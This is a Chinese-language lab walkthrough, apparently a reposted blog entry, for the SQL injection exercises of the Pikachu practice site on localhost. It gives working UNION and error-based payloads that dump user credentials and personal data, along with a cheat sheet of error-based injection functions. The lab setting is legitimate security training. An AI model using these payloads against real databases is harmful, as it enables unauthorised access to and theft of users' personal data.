首页 > 数据库技术 > 详细

pikachu SQL-Injection

时间:2019-12-18 22:41:11      阅读:166      评论:0      收藏:0      [点我收藏+]

1.数字型注入(POST)

技术分享图片

 

 

 可以看到,这个参数提交是POST类型的,用burp。

技术分享图片

 

 

 测试参数id 

id=1&submit=%E6%9F%A5%E8%AF%A2

技术分享图片

 

 

 可以看到有报错回显,而且根据回显可以判断这个注入为数字型注入,构造payload

查询此表单有多少列

技术分享图片

 

 

 技术分享图片

 

 

 技术分享图片

 

 

 确定只有两列,union注入

id=-1 union select database(),version()

技术分享图片

 

 

 查询出数据库名为pikachu  数据库版本为5.5.39

继续查询pikachu数据库内有什么表

id=-1 union select group_concat(table_name),2 from information_schema.tables where table_schema=pikachu

技术分享图片

继续查询member表内有什么列、

id=-1 union select group_concat(column_name),2 from information_schema.columns where table_name=member

技术分享图片

 

 

 查询所有字段

id=-1 union select group_concat(id,username,pw,sex,phonenum,address,email),2 from member

技术分享图片

 

 

 用户表里的所有数据就被注入出来了。

2.字符型注入(get)

 先尝试查询

技术分享图片

 

 

 测试sql注入

allen

技术分享图片

 

 

 出现报错,说明此字符型注入为 闭合

技术分享图片

 说明闭合成功,没有 ) 存在,而且经过测试没有过滤。所以直接用第一关的payload即可

allen union select group_concat(id,username,pw,sex,phonenum,address,email),2 from member#

技术分享图片

 

 

  所有用户数据都被注入出来了

3.搜索型注入

测试一下

技术分享图片

 

 

 说明后台语句将参数传递进去时,查询语句的的目标为 al%‘

测试发现没有过滤,直接用之前的payload,但是又有一点不同,这里有三个回显位,所以要加一个字段

0% union select group_concat(id,username,pw,sex,phonenum,address,email),2,3 from member#

技术分享图片

 

 

 所有用户数据都被注入出来了

4.xx型注入

照常测试

allen

回显报错

技术分享图片

 

 

 说明此语句闭合为   (‘allen‘)

并且经过测试,此查询位置也没有过滤,可以直接用第二关的payload,稍微改造一下。

-1) union select group_concat(id,username,pw,sex,phonenum,address,email),2 from member#

技术分享图片

 

 

 用户信息都被注入出来。

5.insert/update注入

根据判断,此关为insert/update注入,应该是在注册或者修改用户账号信息的时候存在注入漏洞,如图。

技术分享图片

 

 

 大致判断此处insert语句为

insert into user(name,password,sex,phone,address1,address2) value(1,1,1,1,1,1)

所以这里没办法使用select拼接,且无回显,我们需要利用报错注入来使数据库将目标信息当做错误信息返回回来

我们在这里使用最省力气的方法,如果在前几个字段注入,肯定还要闭合后面的字段,所以我们直接注入最后一个地址,而地址肯定为字符型,所以我们可以直接构造payload如下,前几个瞎填就行,因为这是最后一个字段,所以闭合括号之后,直接用#注释掉之后的语句即可

aaa and 1=(updatexml(1,concat(0x3a,(select user())),1)))#

报错信息回显,select user()执行成功,而且此位置无过滤,想获得其他信息,参考之前的payload

技术分享图片

 

除此之外,还有很多可以导致报错注入的函数。在这里分享一下。

1、通过floor报错,注入语句如下:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2、通过ExtractValue报错,注入语句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3、通过UpdateXml报错,注入语句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、通过NAME_CONST报错,注入语句如下:
and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、通过join报错,注入语句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

6、通过exp报错,注入语句如下:
and exp(~(select * from (select user () ) a) );

7、通过GeometryCollection()报错,注入语句如下:
and GeometryCollection(()select *from(select user () )a)b );

8、通过polygon ()报错,注入语句如下:
and polygon (()select * from(select user ())a)b );

9、通过multipoint ()报错,注入语句如下:
and multipoint (()select * from(select user() )a)b );

10、通过multlinestring ()报错,注入语句如下:
and multlinestring (()select * from(selectuser () )a)b );

11、通过multpolygon ()报错,注入语句如下:
and multpolygon (()select * from(selectuser () )a)b );

12、通过linestring ()报错,注入语句如下:
and linestring (()select * from(select user() )a)b );

同理,做update注入,update肯定在修改个人信息的位置,我们同样选择最后一个框框,省事。

技术分享图片

 

 还利用刚才的payload

aaa and 1=(updatexml(1,concat(0x3a,(select user())),1)))#

结果发现报错了

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near )# where username=allen‘‘ at line 1

这时才想起来update语句不太一样,update语句格式如下

UPDATE `member` SET `id`=[value-1],`username`=[value-2],`pw`=[value-3],`sex`=[value-4],`phonenum`=[value-5],`address`=[value-6],`email`=[value-7] WHERE 1

所以不管在哪个列都要闭合,所以改一下payload

aaa and 1=(updatexml(1,concat(0x3a,(select user())),1)) and 

返回结果正确

技术分享图片

 

 其他数据,利用select语句查询。

6.delete注入

技术分享图片

 

 此关长这样,判断应该是先留言,然后在删除的时候可以触发delete注入

先留个严,查看删除链接。

技术分享图片

 

 可以判断这个id参数存在delete注入,先查看delete语句模板

DELETE FROM `member` WHERE id=$id;

直接构造payload

and 1=(updatexml(1,concat(0x3a,(select user())),1))

然后直接访问url

http://127.0.0.1/pikachu/vul/sqli/sqli_del.php?id=58 and 1=(updatexml(1,concat(0x3a,(select%20user())),1))

看到delete报错注入成功

技术分享图片

 

 其他信息利用select查询。

7.http header注入

首先发现需要登录,那就先登录试试。

技术分享图片

 

 发现他获取了我的http头信息,所以应该是在http头构造sql语句。

pikachu SQL-Injection

原文:https://www.cnblogs.com/p201721410013/p/12063758.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!